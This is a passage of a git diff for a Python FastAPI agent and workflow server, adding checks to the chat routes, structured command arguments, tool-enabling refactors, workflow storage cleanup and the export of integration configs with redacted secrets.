+        parts=_replace_text_parts(event.parts, prompt_text, event.metadata or None),
         display_text=display_text,
         agent=event.agent,
         model=_coerce_model_for_prompt_request(event.model),
@@ -3174,6 +3349,13 @@ async def _publish_direct_response(output_event, text: str) -> None:
                 "time": {"start": asst_now, "end": asst_now},
             }
         })
+        await _publish_context_usage_update(
+            publish_event,
+            sessionID,
+            session=session,
+            provider_id="builtin",
+            model_id="command",
+        )
 
     async def _run_llm(output_event, prompt_text: str, display_text: Optional[str] = None) -> None:
         request = _build_prompt_request_from_event(output_event, prompt_text, display_text)
@@ -3219,7 +3401,18 @@ async def _run_session_control(output_event, parsed) -> bool:
         session_control=_run_session_control,
         clear_history=_clear_history,
     )
-    await dispatch_user_input(event, sink)
+    result = await dispatch_user_input(event, sink)
+    if result.command_name == "goal" and result.action == "llm":
+        from flocks.session.goal import GoalManager
+
+        state = await GoalManager.get(sessionID)
+        if state is not None:
+            await publish_event("session.goal.updated", {
+                "sessionID": sessionID,
+                "status": state.status,
+                "objective": state.objective,
+                "reason": state.last_reason,
+            })
 
 
 class PromptQueueUpdateRequest(BaseModel):
@@ -3232,6 +3425,7 @@ async def _enqueue_prompt_request(
 ):
     from flocks.session.interaction_queue import InteractionQueue
 
+    await _require_agent_usable_for_chat(request.agent)
     model = request.model.model_dump(by_alias=True) if request.model else None
     parts = _materialize_queued_parts(session_id, [dict(part) for part in request.parts])
     return await InteractionQueue.enqueue(
@@ -3240,6 +3434,7 @@ async def _enqueue_prompt_request(
         agent=request.agent,
         model=model,
         variant=request.variant,
+        display_text=request.display_text,
         message_id=request.messageID,
         no_reply=request.noReply,
         mock_reply=request.mockReply,
@@ -3281,6 +3476,7 @@ async def enqueue_prompt(sessionID: str, request: PromptRequest) -> Dict[str, An
             status_code=status.HTTP_404_NOT_FOUND,
             detail=f"Session {sessionID} not found",
         )
+    await _require_agent_usable_for_chat(request.agent)
     try:
         item = await _enqueue_prompt_request(sessionID, request)
     except QueueFullError as exc:
@@ -3392,6 +3588,7 @@ async def send_session_message_async(
         _require_session_write_access(session, current_user)
     
     working_directory = session.directory or os.getcwd()
+    await _require_agent_usable_for_chat(request.agent)
     
     log.info("session.prompt_async.accepted", {
         "sessionID": sessionID,
@@ -3406,7 +3603,7 @@ async def send_session_message_async(
         agent=request.agent,
         model=request.model.model_dump(by_alias=True) if request.model else None,
         variant=request.variant,
-        display_text=None,
+        display_text=request.display_text,
         messageID=request.messageID,
         noReply=request.noReply,
         mockReply=request.mockReply,
@@ -3441,6 +3638,7 @@ class CommandRequest(BaseModel):
     
     command: str = Field(..., description="Command name")
     arguments: str = Field("", description="Command arguments")
+    arguments_json: Optional[Any] = Field(None, alias="argumentsJson", description="Structured command arguments")
     messageID: Optional[str] = Field(None, description="Message ID")
     agent: Optional[str] = Field(None, description="Agent name")
     model: Optional[str] = Field(None, description="Model string (provider/model)")
@@ -3487,11 +3685,18 @@ async def send_session_command(sessionID: str, request: CommandRequest, http_req
         _require_session_write_access(session, current_user)
 
     working_directory = session.directory or os.getcwd()
+    await _require_agent_usable_for_chat(request.agent)
+    raw_arguments = request.arguments
+    if not raw_arguments and request.arguments_json is not None:
+        raw_arguments = json.dumps(request.arguments_json, ensure_ascii=False)
+    command_metadata: Dict[str, Any] = {}
+    if request.arguments_json is not None:
+        command_metadata["commandArgumentsJson"] = request.arguments_json
 
     # The text the user typed, shown verbatim in the chat bubble
     slash_text = f"/{request.command}"
-    if request.arguments:
-        slash_text += f" {request.arguments}"
+    if raw_arguments:
+        slash_text += f" {raw_arguments}"
 
     # ── Background task ──────────────────────────────────────────────────────
     async def _handle_command() -> None:
@@ -3503,6 +3708,7 @@ async def _handle_command() -> None:
             agent=request.agent,
             model=request.model,
             variant=request.variant,
+            metadata=command_metadata,
             display_text=slash_text,
             messageID=request.messageID,
             working_directory=working_directory,
@@ -3740,11 +3946,16 @@ async def get_session_statistics(sessionID: str):
     - Model usage
     """
     try:
-        # Get session
-        session = await Session.load(sessionID)
-        
-        # Get messages
-        messages = await session.get_messages()
+        session = await _get_session_by_id_unfiltered(sessionID)
+        if not session:
+            raise HTTPException(
+                status_code=status.HTTP_404_NOT_FOUND,
+                detail=f"Session {sessionID} not found",
+            )
+
+        from flocks.session.message import Message
+
+        messages = await Message.list_with_parts(sessionID, include_archived=True)
         
         # Calculate statistics
         message_count = len(messages)
@@ -3752,26 +3963,27 @@ async def get_session_statistics(sessionID: str):
         tool_call_count = 0
         model_usage = {}
         
-        for msg in messages:
+        for message_with_parts in messages:
+            msg = message_with_parts.info
+
             # Count tokens (approximate from parts)
-            for part in msg.parts:
-                if hasattr(part, 'text') and part.text:
+            for part in message_with_parts.parts:
+                if hasattr(part, "text") and part.text:
                     token_count += len(part.text.split())  # Rough approximation
                 
                 # Count tool calls
-                if hasattr(part, 'toolCall') and part.toolCall:
+                if getattr(part, "type", None) == "tool":
                     tool_call_count += 1
             
             # Track model usage
-            if msg.model:
-                model_usage[msg.model] = model_usage.get(msg.model, 0) + 1
-        
-        # Get session info
-        info = await session.get_info()
+            model = getattr(msg, "model", None)
+            if model:
+                model_key = model if isinstance(model, str) else json.dumps(model, sort_keys=True, default=str)
+                model_usage[model_key] = model_usage.get(model_key, 0) + 1
         
         # Calculate duration
-        created_ms = info.time.created
-        updated_ms = info.time.updated
+        created_ms = session.time.created
+        updated_ms = session.time.updated
         duration_ms = updated_ms - created_ms
         duration_seconds = duration_ms / 1000
         
@@ -3788,6 +4000,8 @@ async def get_session_statistics(sessionID: str):
         
         log.info("session.statistics", {"sessionID": sessionID, "messages": message_count})
         return stats
+    except HTTPException:
+        raise
     except Exception as e:
         log.error("session.statistics.error", {"sessionID": sessionID, "error": str(e)})
         raise HTTPException(status_code=500, detail=f"Failed to get session statistics: {str(e)}")
@@ -3803,11 +4017,13 @@ async def _clear_session_history(sessionID: str) -> int:
         )
 
     from flocks.server.routes.event import publish_event
+    from flocks.session.goal import GoalManager
     from flocks.session.interaction_queue import InteractionQueue
     from flocks.session.message import Message
 
     await abort_session(sessionID)
     await InteractionQueue.clear(sessionID)
+    await GoalManager.clear(sessionID)
     try:
         await _publish_prompt_queue(sessionID)
     except Exception as exc:
diff --git a/flocks/server/routes/skill.py b/flocks/server/routes/skill.py
index 556720b42..f270b15c8 100644
--- a/flocks/server/routes/skill.py
+++ b/flocks/server/routes/skill.py
@@ -81,6 +81,7 @@ class SkillResponse(BaseModel):
     source: Optional[str] = Field(None, description="Discovery source")
     content: Optional[str] = Field(None, description="Full SKILL.md content")
     category: Optional[str] = Field(None, description="Skill category (e.g. 'system')")
+    ui_hidden: bool = Field(False, description="Whether the skill is omitted from user-facing skill UI")
     # Extended fields
     eligible: Optional[bool] = Field(None, description="Whether all requirements are met")
     missing: Optional[List[str]] = Field(None, description="Missing bins/env vars")
@@ -246,6 +247,7 @@ def _skill_to_response(
         source=skill.source,
         content=content,
         category=skill.category,
+        ui_hidden=skill.ui_hidden,
         eligible=skill.eligible,
         missing=skill.missing,
         requires=requires_resp,
@@ -443,6 +445,7 @@ async def create_skill(req: SkillCreateRequest, _user=Depends(require_user)):
             location=str(skill_path),
             source="user",
             content=full_content,
+            ui_hidden=False,
             disabled=False,
         )
     except HTTPException:
@@ -512,6 +515,7 @@ async def update_skill(name: str, req: SkillCreateRequest, _user=Depends(require
             location=location,
             source=skill.source,
             content=full_content,
+            ui_hidden=skill.ui_hidden,
             # Reflect the post-update disabled state so the UI doesn't
             # report ``disabled=False`` when the user actually renamed a
             # disabled skill (Skill.rename_disabled migrates the flag).
diff --git a/flocks/server/routes/tool.py b/flocks/server/routes/tool.py
index 6a4590add..765a1f3e7 100644
--- a/flocks/server/routes/tool.py
+++ b/flocks/server/routes/tool.py
@@ -423,6 +423,37 @@ def _get_effective_tool_enabled(tool_info: ToolInfo) -> bool:
     return tool_info.enabled and _get_api_service_enabled(source_name)
 
 
+def _set_global_tool_enabled(tool: Any, desired: bool) -> bool:
+    """Persist the requested global enabled state for a registry tool, apply the service-gated result in memory, and return it."""
+    default = _get_default_enabled(tool.info)
+    # Service gate: only matters when the user is trying to enable.
+    # Disabling is always honoured.
+    service_ok = _service_allows_enable(tool.info)
+    new_enabled = desired and service_ok
+
+    if desired == default:
+        removed = ConfigWriter.delete_tool_setting(tool.info.name)
+        log.info("tool.updated.reset_to_default", {
+            "name": tool.info.name,
+            "enabled": new_enabled,
+            "default": default,
+            "removed_overlay": removed,
+        })
+    else:
+        ConfigWriter.set_tool_setting(tool.info.name, {"enabled": desired})
+        log.info("tool.updated", {
+            "name": tool.info.name,
+            "enabled": new_enabled,
+            "requested": desired,
+            "blocked_by_service": desired and not service_ok,
+            "native": tool.info.native,
+            "store": "overlay",
+        })
+
+    tool.info.enabled = new_enabled
+    return new_enabled
+
+
 # Routes
 
 @router.get(
@@ -529,9 +560,11 @@ async def update_tool(
     Persists to the SQLite ``device_tool_settings`` table (one row per
     device_id × tool_name).  Only affects tool execution when ``device_id``
     is explicitly targeted, allowing Device A and Device B (same plugin
-    version, different names) to carry independent tool enabled/disabled
-    states.  Rows are removed automatically via ON DELETE CASCADE when the
-    parent device row is deleted.
+    version, different names) to carry independent disabled overrides.
+    ``enabled=true`` clears the per-device disable and follows the global
+    tool setting; if the global tool is disabled, it is enabled first. Rows
+    are removed automatically via ON DELETE CASCADE when the parent device row
+    is deleted.
 
     Two behaviours of note (global mode only):
 
@@ -561,14 +594,16 @@ async def update_tool(
             delete_device_tool_setting,
             set_device_tool_enabled,
         )
+
         if desired:
-            # "Enable" in per-device mode means removing the per-device
-            # override so the global/factory default takes effect again.
+            if not tool.info.enabled:
+                _set_global_tool_enabled(tool, True)
             removed = await delete_device_tool_setting(device_id, tool_name)
             log.info("tool.device.updated.reset_to_global", {
                 "name": tool_name,
                 "device_id": device_id,
                 "removed_override": removed,
+                "enabled_global": tool.info.enabled,
             })
         else:
             await set_device_tool_enabled(device_id, tool_name, False)
@@ -577,37 +612,13 @@ async def update_tool(
                 "device_id": device_id,
                 "enabled": False,
             })
-        # The in-memory ToolInfo.enabled is NOT changed; it reflects global
-        # state.  Per-device gating happens at ToolRegistry.execute time.
+        # The in-memory ToolInfo.enabled reflects global state. Per-device
+        # enabled=True is not a supported override; switch-on means clear the
+        # per-device disable and follow the global tool setting.
         return _build_tool_response(tool.info)
 
     # --- Global mode (original behaviour) ---
-    default = _get_default_enabled(tool.info)
-    # Service gate: only matters when the user is trying to enable.
-    # Disabling is always honoured.
-    service_ok = _service_allows_enable(tool.info)
-    new_enabled = desired and service_ok
-
-    if desired == default:
-        removed = ConfigWriter.delete_tool_setting(tool_name)
-        log.info("tool.updated.reset_to_default", {
-            "name": tool_name,
-            "enabled": new_enabled,
-            "default": default,
-            "removed_overlay": removed,
-        })
-    else:
-        ConfigWriter.set_tool_setting(tool_name, {"enabled": desired})
-        log.info("tool.updated", {
-            "name": tool_name,
-            "enabled": new_enabled,
-            "requested": desired,
-            "blocked_by_service": desired and not service_ok,
-            "native": tool.info.native,
-            "store": "overlay",
-        })
-
-    tool.info.enabled = new_enabled
+    _set_global_tool_enabled(tool, desired)
     return _build_tool_response(tool.info)
 
 
diff --git a/flocks/server/routes/user_defined_pages.py b/flocks/server/routes/user_defined_pages.py
index 151cfcffe..924422064 100644
--- a/flocks/server/routes/user_defined_pages.py
+++ b/flocks/server/routes/user_defined_pages.py
@@ -270,7 +270,6 @@ async def get_user_defined_page_bundle(page_id: str, v: Optional[str] = Query(No
         return FileResponse(
             path=bundle_path,
             media_type="application/javascript",
-            filename="page.js",
             headers=headers,
         )
     except ValueError as exc:
diff --git a/flocks/server/routes/workflow.py b/flocks/server/routes/workflow.py
index a54631a4a..62d846d14 100644
--- a/flocks/server/routes/workflow.py
+++ b/flocks/server/routes/workflow.py
@@ -16,7 +16,7 @@
 from dataclasses import dataclass
 from pathlib import Path
 from typing import List, Optional, Any, Dict, Literal
-from fastapi import APIRouter, HTTPException, Request, status, Query
+from fastapi import APIRouter, Body, HTTPException, Request, status, Query
 from pydantic import BaseModel, Field, ConfigDict
 import uuid
 
@@ -47,17 +47,23 @@
 from flocks.ingest.syslog.constants import WORKFLOW_SYSLOG_CONFIG_PREFIX
 from flocks.workflow.execution_store import (
     compact_history_for_storage,
+    compact_execution_summary,
     compact_outputs_for_storage,
     compact_step_for_storage,
     create_execution_record,
+    derive_loop_progress,
+    load_execution_steps,
     normalize_execution_status as _normalize_execution_status,
+    record_execution_step,
     record_execution_result as _record_execution_result,
     resolve_execution_outcome as _resolve_execution_outcome,
     workflow_execution_key as _workflow_execution_key,
+    workflow_execution_step_prefix as _workflow_execution_step_prefix,
 )
 from flocks.workflow.io import load_workflow, dump_workflow
 from flocks.workflow.tool_context import build_workflow_tool_context
 from flocks.workflow.tools import get_tool_registry
+from flocks.workflow.visibility import is_hidden_workflow_data
 from flocks.workflow.triggers import (
     TriggerDefinition,
     TriggerEvent,
@@ -88,7 +94,34 @@
 webhook_router = APIRouter()
 log = Log.create(service="workflow-routes")
 
+_PROGRESS_FLUSH_EVERY_STEPS = 5
+
 _LEGACY_SINGLETON_TRIGGER_TYPES = frozenset({"schedule", "kafka", "syslog"})
+_WORKFLOW_INTEGRATION_CONFIG_VERSION = 1
+_WORKFLOW_INTEGRATION_CONFIG_KIND = "workflow.integration-config"
+_WORKFLOW_INTEGRATION_CONFIG_PREFIX = "workflow_integration_config/"
+_WORKFLOW_CENTER_REGISTRY_PREFIX = "workflow_registry/"
+_WORKFLOW_CENTER_RELEASE_PREFIX = "workflow_release/"
+_WORKFLOW_CENTER_RUNTIME_PREFIX = "workflow_runtime/"
+_WORKFLOW_CENTER_LOCAL_PID_PREFIX = "workflow_local_pid/"
+_WORKFLOW_POLLER_CONFIG_PREFIX = "workflow_poller_config/"
+_WORKFLOW_CONFIG_TRIGGER_TYPES = frozenset({
+    "manual",
+    "schedule",
+    "webhook",
+    "syslog",
+    "kafka",
+    "internal_event",
+    "custom_webhook",
+    "custom_adapter",
+    "plugin",
+    "api",
+    "publish",
+    "api_service",
+    "service",
+})
+_WORKFLOW_CONFIG_SECRET_KEYS = frozenset({"apikey", "password", "token", "secret"})
+_WORKFLOW_CONFIG_SECRET_REF_KEYS = frozenset({"secretref", "secretreference"})
 
 
 @dataclass
@@ -111,6 +144,7 @@ class WorkflowCreateRequest(BaseModel):
     model_config = ConfigDict(populate_by_name=True)
     
     name: str = Field(..., description="Workflow name")
+    name_i18n: Optional[Dict[str, str]] = Field(None, alias="nameI18n", description="Localized workflow display names")
     description: Optional[str] = Field(None, description="Workflow description")
     category: Optional[str] = Field("default", description="Workflow category")
     workflow_json: Dict[str, Any] = Field(..., alias="workflowJson", description="Workflow JSON definition")
@@ -126,9 +160,20 @@ class WorkflowUpdateRequest(BaseModel):
     model_config = ConfigDict(populate_by_name=True)
     
     name: Optional[str] = Field(None, description="Workflow name")
+    name_i18n: Optional[Dict[str, str]] = Field(None, alias="nameI18n", description="Localized workflow display names")
     description: Optional[str] = Field(None, description="Workflow description")
     category: Optional[str] = Field(None, description="Workflow category")
     workflow_json: Optional[Dict[str, Any]] = Field(None, alias="workflowJson", description="Workflow JSON")
+    markdown_content: Optional[str] = Field(
+        None,
+        alias="markdownContent",
+        description="Human-editable workflow.md content",
+    )
+    edit_markdown_content: Optional[str] = Field(
+        None,
+        alias="editMarkdownContent",
+        description="Legacy alias for markdownContent",
+    )
     status: Optional[Literal["draft", "active", "archived"]] = Field(None, description="Status")
 
 
@@ -138,8 +183,10 @@ class WorkflowResponse(BaseModel):
     
     id: str = Field(..., description="Workflow ID")
     name: str = Field(..., description="Workflow name")
+    nameI18n: Optional[Dict[str, str]] = Field(None, description="Localized workflow display names")
     description: Optional[str] = Field(None, description="Description")
     markdownContent: Optional[str] = Field(None, description="Workflow markdown documentation content")
+    editMarkdownContent: Optional[str] = Field(None, description="Human-editable workflow markdown document content")
     category: str = Field("default", description="Category")
     workflowJson: Dict[str, Any] = Field(..., description="Workflow JSON")
     status: str = Field("draft", description="Status")
@@ -185,6 +232,11 @@ class WorkflowExecutionResponse(BaseModel):
     currentNodeType: Optional[str] = Field(None, description="Current running node type")
     currentPhase: Optional[str] = Field(None, description="Current execution phase")
     currentStepIndex: Optional[int] = Field(None, description="Current step index")
+    stepCount: Optional[int] = Field(None, description="Persisted execution step count")
+    stepLogOffset: Optional[int] = Field(None, description="Returned step log offset")
+    stepLogLimit: Optional[int] = Field(None, description="Returned step log limit")
+    stepLogTotal: Optional[int] = Field(None, description="Total persisted step logs")
+    loopProgress: Optional[Dict[str, Any]] = Field(None, description="Best-effort loop progress metadata")
 
 
 class WorkflowCenterPublishRequest(BaseModel):
@@ -235,6 +287,31 @@ def _global_workflow_dir(workflow_id: str) -> Path:
     return Path.home() / ".flocks" / "plugins" / "workflows" / workflow_id
 
 
+def _existing_workflow_dir(workflow_id: str) -> Optional[Path]:
+    """Return the workflow's dir under the last scan root holding its workflow.json, else None."""
+    matches = [
+        scan_root / workflow_id
+        for scan_root, _origin in _all_scan_dirs()
+        if (scan_root / workflow_id / "workflow.json").is_file()
+    ]
+    return matches[-1] if matches else None
+
+
+def _workflow_config_dir(workflow_id: str, workflow_data: Optional[Dict[str, Any]] = None) -> Path:
+    """Return where config.json is written: the existing workflow dir, else a global/default one."""
+    found_dir = _existing_workflow_dir(workflow_id)
+    if found_dir is not None:
+        return found_dir
+    # Nothing on disk yet: choose the store from the workflow's ``source`` field.
+    wants_global = bool(workflow_data) and workflow_data.get("source") == "global"
+    return _global_workflow_dir(workflow_id) if wants_global else _workflow_dir(workflow_id)
+
+
+def _workflow_integration_config_key(workflow_id: str) -> str:
+    """Build the Storage key holding the publish/integration template used by the UI."""
+    return "{}{}".format(_WORKFLOW_INTEGRATION_CONFIG_PREFIX, workflow_id)
+
+
 def _read_workflow_from_fs(workflow_id: str) -> Optional[Dict[str, Any]]:
     """Read workflow data from the filesystem.
 
@@ -269,6 +346,7 @@ def _write_workflow_to_fs(
     workflow_json: Dict[str, Any],
     meta: Dict[str, Any],
     markdown_content: Optional[str] = None,
+    edit_markdown_content: Optional[str] = None,
     *,
     global_store: bool = False,
 ) -> None:
@@ -283,14 +361,25 @@ def _write_workflow_to_fs(
     with open(wf_dir / "workflow.json", "w", encoding="utf-8") as f:
         json.dump(workflow_json, f, ensure_ascii=False, indent=2)
 
-    meta_to_save = {k: v for k, v in meta.items() if k not in ("workflowJson", "markdownContent", "stats", "source")}
+    meta_to_save = {
+        k: v
+        for k, v in meta.items()
+        if k not in ("workflowJson", "markdownContent", "editMarkdownContent", "stats", "source")
+    }
     with open(wf_dir / "meta.json", "w", encoding="utf-8") as f:
         json.dump(meta_to_save, f, ensure_ascii=False, indent=2)
 
+    if markdown_content is None and edit_markdown_content is not None:
+        markdown_content = edit_markdown_content
+
     if markdown_content is not None:
         with open(wf_dir / "workflow.md", "w", encoding="utf-8") as f:
             f.write(markdown_content)
 
+    legacy_edit_file = wf_dir / "workflow.edit.md"
+    if legacy_edit_file.exists():
+        legacy_edit_file.unlink()
+
 
 def _delete_workflow_from_fs(workflow_id: str) -> bool:
     """Remove a workflow directory from all known locations (primary + legacy plugins).
@@ -307,6 +396,80 @@ def _delete_workflow_from_fs(workflow_id: str) -> bool:
     return deleted
 
 
+async def _remove_storage_key_if_exists(key: str) -> None:
+    """Remove one Storage key; a missing key is ignored and other failures are only logged."""
+    try:
+        await Storage.remove(key)
+    except Exception as exc:
+        if not isinstance(exc, Storage.NotFoundError):
+            log.warning("workflow.delete.storage_key_remove_failed", {"key": key, "error": str(exc)})
+
+
+async def _remove_storage_prefix(prefix: str) -> None:
+    """Remove every key that ``Storage.list(prefix)`` returns, on a best-effort basis.
+
+    A failed listing is logged and aborts the cleanup; per-key failures are logged and skipped.
+    """
+    try:
+        matching_keys = await Storage.list(prefix)
+    except Exception as exc:
+        log.warning("workflow.delete.storage_prefix_list_failed", {"prefix": prefix, "error": str(exc)})
+        return
+
+    for stored_key in matching_keys:
+        # Same missing-key-tolerant, log-on-failure removal used for single keys.
+        await _remove_storage_key_if_exists(stored_key)
+
+
+async def _stop_workflow_runtime_resources(workflow_id: str) -> None:
+    """Set the cancel event on the workflow's active runs, then stop its service and triggers."""
+    for active in list(_active_workflow_executions.values()):
+        if active.workflow_id == workflow_id:
+            active.cancel_event.set()
+    try:
+        await stop_workflow_service(workflow_id)
+    except Exception as exc:
+        log.debug("workflow.delete.stop_service_ignored", {"id": workflow_id, "error": str(exc)})
+    # Restarting with an empty trigger list presumably leaves nothing running; confirm in the runtime.
+    try:
+        await default_trigger_runtime.restart_workflow(workflow_id, {"triggers": []})
+    except Exception as exc:
+        log.debug("workflow.delete.stop_triggers_ignored", {"id": workflow_id, "error": str(exc)})
+
+
+async def _cleanup_workflow_storage(workflow_id: str) -> None:
+    """Best-effort purge of a workflow's Storage keys, execution rows and service directory."""
+    await _remove_storage_key_if_exists(_workflow_stats_key(workflow_id))
+    await _remove_storage_key_if_exists(_workflow_integration_config_key(workflow_id))
+    await _remove_storage_key_if_exists(_api_service_key(workflow_id))
+    await _remove_storage_key_if_exists(_syslog_config_key(workflow_id))
+    await _remove_storage_key_if_exists(_kafka_config_key(workflow_id))
+    await _remove_storage_key_if_exists(f"{_WORKFLOW_POLLER_CONFIG_PREFIX}{workflow_id}")
+    await _remove_storage_key_if_exists(f"{_WORKFLOW_CENTER_REGISTRY_PREFIX}{workflow_id}")
+    await _remove_storage_key_if_exists(f"{_WORKFLOW_CENTER_RUNTIME_PREFIX}{workflow_id}")
+    await _remove_storage_key_if_exists(f"{_WORKFLOW_CENTER_LOCAL_PID_PREFIX}{workflow_id}")
+    await _remove_storage_prefix(f"{_WORKFLOW_CENTER_RELEASE_PREFIX}{workflow_id}/")
+
+    try:
+        exec_keys = await Storage.list("workflow_execution/")
+    except Exception as exc:
+        log.warning("workflow.delete.execution_list_failed", {"id": workflow_id, "error": str(exc)})
+        exec_keys = []
+    for key in exec_keys:
+        try:
+            exec_data = await Storage.read(key)
+            if isinstance(exec_data, dict) and exec_data.get("workflowId") == workflow_id:
+                exec_id = key.rsplit("/", 1)[-1]
+                for step_key, _value in await Storage.list_raw(_workflow_execution_step_prefix(exec_id)):
+                    await Storage.remove(step_key)
+                await Storage.remove(key)  # Summary goes last so a failure cannot orphan step rows.
+        except Exception as exc:
+            log.warning("workflow.delete.execution_remove_failed", {"key": key, "error": str(exc)})
+    service_dir = Config.get_data_path() / "workflow-services" / "workflows" / workflow_id
+    if service_dir.is_dir():
+        shutil.rmtree(service_dir, ignore_errors=True)
+
+
 def _scan_workflow_base_dir(base_dir: Path, source: str) -> Dict[str, Dict[str, Any]]:
     """Scan a single workflow base directory and return {id: data} dict."""
     results: Dict[str, Dict[str, Any]] = {}
@@ -316,7 +479,7 @@ def _scan_workflow_base_dir(base_dir: Path, source: str) -> Dict[str, Dict[str,
         if not entry.is_dir():
             continue
         data = _read_workflow_dir(entry, entry.name, source)
-        if data is not None:
+        if data is not None and not is_hidden_workflow_data(data):
             results[entry.name] = data
     return results
 
@@ -459,6 +622,281 @@ def _trigger_to_api_dict(trigger: TriggerDefinition) -> Dict[str, Any]:
     return trigger.model_dump(mode="json", by_alias=True, exclude_none=True)
 
 
+def _drop_none_values(payload: Dict[str, Any]) -> Dict[str, Any]:
+    return dict(pair for pair in payload.items() if pair[1] is not None)  # shallow; keeps 0, "" and False
+
+
+def _normalized_config_key(key: Any) -> str:
+    return "".join(ch for ch in str(key) if ch not in "_-").lower()  # e.g. "api_Key" -> "apikey"
+
+
+def _sanitize_workflow_config_secrets(value: Any) -> Any:
+    """Recursively drop secret-looking keys, leaving a ``<key>Configured`` flag for set values."""
+    if isinstance(value, list):
+        return [_sanitize_workflow_config_secrets(element) for element in value]
+    if not isinstance(value, dict):
+        return value
+
+    cleaned: Dict[str, Any] = {}
+    for key, nested in value.items():
+        normalized_key = _normalized_config_key(key)
+        looks_secret = normalized_key in _WORKFLOW_CONFIG_SECRET_KEYS or normalized_key.endswith(
+            ("apikey", "password", "token", "secret")
+        )
+        if not looks_secret or normalized_key in _WORKFLOW_CONFIG_SECRET_REF_KEYS:
+            cleaned[str(key)] = _sanitize_workflow_config_secrets(nested)
+        elif nested not in (None, ""):
+            # Record only that a value was present; the value itself is never copied.
+            flag_name = "apiKeyConfigured" if normalized_key == "apikey" else f"{key}Configured"
+            cleaned[flag_name] = True
+    return cleaned
+
+
+def _normalize_workflow_integration_config_template(
+    workflow_id: str,
+    workflow_data: Dict[str, Any],
+    config: Dict[str, Any],
+) -> Dict[str, Any]:
+    """Sanitize and validate an integration config template; raises HTTPException (422/409) on bad input."""
+    if not isinstance(config, dict):
+        raise HTTPException(status_code=422, detail="config must be a JSON object")
+    payload = _sanitize_workflow_config_secrets(config)
+    payload.pop("runtime", None)
+
+    kind = payload.get("kind", _WORKFLOW_INTEGRATION_CONFIG_KIND)
+    if kind != _WORKFLOW_INTEGRATION_CONFIG_KIND:
+        raise HTTPException(
+            status_code=422,
+            detail=f"config.kind must be {_WORKFLOW_INTEGRATION_CONFIG_KIND}",
+        )
+    payload["kind"] = _WORKFLOW_INTEGRATION_CONFIG_KIND
+
+    version = payload.get("version", _WORKFLOW_INTEGRATION_CONFIG_VERSION)
+    if isinstance(version, bool) or not isinstance(version, int):  # bool is an int subclass
+        raise HTTPException(status_code=422, detail="config.version must be an integer")
+    payload["version"] = version
+
+    workflow = payload.get("workflow") or {}
+    if not isinstance(workflow, dict):
+        raise HTTPException(status_code=422, detail="config.workflow must be an object")
+    if workflow.get("id") not in (None, workflow_id):
+        raise HTTPException(status_code=409, detail="config.workflow.id does not match the route workflow id")
+    workflow["id"] = workflow_id
+    workflow.setdefault("name", workflow_data.get("name") or workflow_id)
+    if workflow_data.get("category") is not None:
+        workflow.setdefault("category", workflow_data.get("category"))
+    if workflow_data.get("source") is not None:
+        workflow.setdefault("source", workflow_data.get("source"))
+    payload["workflow"] = workflow
+
+    publish = payload.get("publish", {})
+    if publish is None:
+        publish = {}
+    if not isinstance(publish, dict):
+        raise HTTPException(status_code=422, detail="config.publish must be an object")
+    payload["publish"] = publish
+    # Fall back to an ``integrations`` list when ``triggers`` is absent.
+    if "triggers" not in payload and isinstance(payload.get("integrations"), list):
+        payload["triggers"] = payload["integrations"]
+    triggers = payload.get("triggers", [])
+    if triggers is None:
+        triggers = []
+    if not isinstance(triggers, list):
+        raise HTTPException(status_code=422, detail="config.triggers must be an array")
+    for index, trigger in enumerate(triggers):
+        if not isinstance(trigger, dict):
+            raise HTTPException(status_code=422, detail=f"config.triggers[{index}] must be an object")
+        trigger_type = str(trigger.get("type") or "").strip()
+        if not trigger_type:
+            raise HTTPException(status_code=422, detail=f"config.triggers[{index}].type is required")
+        normalized_type = trigger_type.lower().replace("-", "_")
+        if normalized_type not in _WORKFLOW_CONFIG_TRIGGER_TYPES:
+            raise HTTPException(
+                status_code=422,
+                detail=f"Unsupported config trigger type: {trigger_type}",
+            )
+        trigger["type"] = normalized_type
+    payload["triggers"] = triggers
+    payload["updatedAt"] = int(time.time() * 1000)
+    return payload
+
+
+def _auth_for_config(auth: Optional[Any]) -> Optional[Dict[str, Any]]:
+    """Serialize trigger auth for config export, replacing ``apiKey`` with an ``apiKeyConfigured`` flag."""
+    if hasattr(auth, "model_dump"):
+        auth_payload = auth.model_dump(mode="json", by_alias=True, exclude_none=True)
+    elif isinstance(auth, dict):
+        auth_payload = dict(auth)
+    else:
+        # Covers ``None`` as well as any unsupported auth type.
+        return None
+
+    if "apiKey" in auth_payload:
+        # Never echo the secret; report it as configured only when it is non-empty.
+        auth_payload["apiKeyConfigured"] = bool(auth_payload.pop("apiKey"))
+    return auth_payload
+
+
+def _trigger_for_config(workflow_id: str, trigger: TriggerDefinition) -> Dict[str, Any]:
+    """Render a trigger for config export: redacted auth, plus invoke info for webhook types."""
+    payload = _trigger_to_api_dict(trigger)
+    if trigger.auth is not None:
+        payload["auth"] = _auth_for_config(trigger.auth)
+
+    if trigger.type in ("webhook", "custom_webhook"):
+        http_method = str((trigger.source or {}).get("method") or "POST").upper()
+        invoke_path = f"/webhook/workflows/{workflow_id}/{trigger.id}"
+        payload["invoke"] = {"method": http_method, "path": invoke_path}
+    return payload
+
+
+def _publish_for_config(service: Optional[Dict[str, Any]]) -> Dict[str, Any]:
+    """Summarize the stored API service record as a ``publish`` section, never exposing the key."""
+    record: Dict[str, Any] = service if isinstance(service, dict) else {}
+    status_value = str(record.get("status") or "stopped")
+
+    summary: Dict[str, Any] = {
+        "type": "api_service",
+        "enabled": bool(record) and status_value not in {"stopped", "unpublished"},
+        "status": status_value,
+    }
+
+    # Optional fields keep this fixed order; ones left as None are filtered out on return.
+    optional_fields = ("driver", "serviceUrl", "invokeUrl", "containerName", "publishedAt", "stoppedAt")
+    for field_name in optional_fields:
+        summary[field_name] = record.get(field_name)
+    summary["apiKeyConfigured"] = bool(record.get("apiKey"))
+    return _drop_none_values(summary)
+
+
+async def _build_workflow_integration_config(
+    workflow_id: str,
+    workflow_data: Dict[str, Any],
+    *,
+    triggers: Optional[List[TriggerDefinition]] = None,
+    service: Optional[Dict[str, Any]] = None,
+) -> Dict[str, Any]:
+    """Build the exportable integration config; triggers/service are loaded when not supplied."""
+    if triggers is None:
+        triggers = await _get_workflow_trigger_defs(workflow_id, workflow_data)
+    if service is None:
+        service = await Storage.read(_api_service_key(workflow_id))
+    return {
+        "version": _WORKFLOW_INTEGRATION_CONFIG_VERSION,
+        # Shared constant, so the result passes the ``kind`` check applied when templates are normalized.
+        "kind": _WORKFLOW_INTEGRATION_CONFIG_KIND,
+        "workflow": _drop_none_values(
+            {
+                "id": workflow_id,
+                "name": workflow_data.get("name") or workflow_id,
+                "category": workflow_data.get("category"),
